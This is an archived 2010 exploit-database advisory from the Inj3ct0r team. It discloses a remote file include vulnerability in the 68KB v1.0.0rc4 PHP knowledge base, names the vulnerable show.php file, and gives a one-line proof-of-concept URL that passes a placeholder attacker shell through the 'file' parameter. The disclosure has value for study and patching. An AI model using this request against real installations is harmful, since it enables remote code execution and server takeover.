AOH :: HP Unsorted Nums :: B1A-1638.HTM

68KB v1.0.0rc4 Remote File Include Vulnerability



68KB v1.0.0rc4 Remote File Include Vulnerability
68KB v1.0.0rc4 Remote File Include Vulnerability



=================================================0D
68KB v1.0.0rc4 Remote File Include Vulnerability=0D
=================================================0D
=0D
=0D
 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0=0D
 0     _                   __           __       __                     1=0D
 1   /' \            __  /'__`\        /\ \__  /'__`\                   0=0D
 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1=0D
 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0=0D
 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1=0D
 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0=0D
 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1=0D
 1                  \ \____/ >> Exploit database separated by exploit   0=0D
 0                   \/___/          type (local, remote, DoS, etc.)    1=0D
 1                                                                      1=0D
 0  [+] Site            : Inj3ct0r.com                                  0=0D
 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1=0D
 0                                                                      0=0D
 1                    ########################################          1=0D
 0                    I'm eidelweiss member from Inj3ct0r Team          1=0D
 1                    ########################################          0=0D
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1=0D
=0D
=0D
Vendor: http://68kb.com=0D 
download: http://github.com/68designs/68KB/downloads=0D 
Author:     eidelweiss=0D
Contact:    g1xsystem[at]windowslive.com=0D
Original Advisories :	http://eidelweiss-advisories.blogspot.com/2010/08/68kb-v100rc4-remote-file-include.html=0D 
======================================================================0D
=0D
Description:=0D
=0D
68KB is an open source PHP MySQL driven knowledge base script. Built with you in mind to make it easy to configure and setup.=0D
=0D
Note:=0D
This is the same vuln in other lower version (http://www.exploit-db.com/exploits/11904/)=0D 
Vendor Not Fix the vulnerability in all folder !!!=0D
=0D
======================================================================0D
 =0D
    -=[ vuln c0de ]=-=0D
 =0D
[!] path/themes/admin/default/modules/show.php=0D
=0D
=0D
	=0D
 =0D
 =0D
======================================================================0D
 =0D
    -=[ P0C ]=-=0D
 =0D
http://127.0.0.1/path/themes/admin/default/modules/show.php?file= [inj3ct0r shell]=0D 
 =0D
=0D
 =0D
=========================| -=[ E0F ]=- |==================================0D
=0D
=0D
# Inj3ct0r.com [2010-08-03]=0D
=0D

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.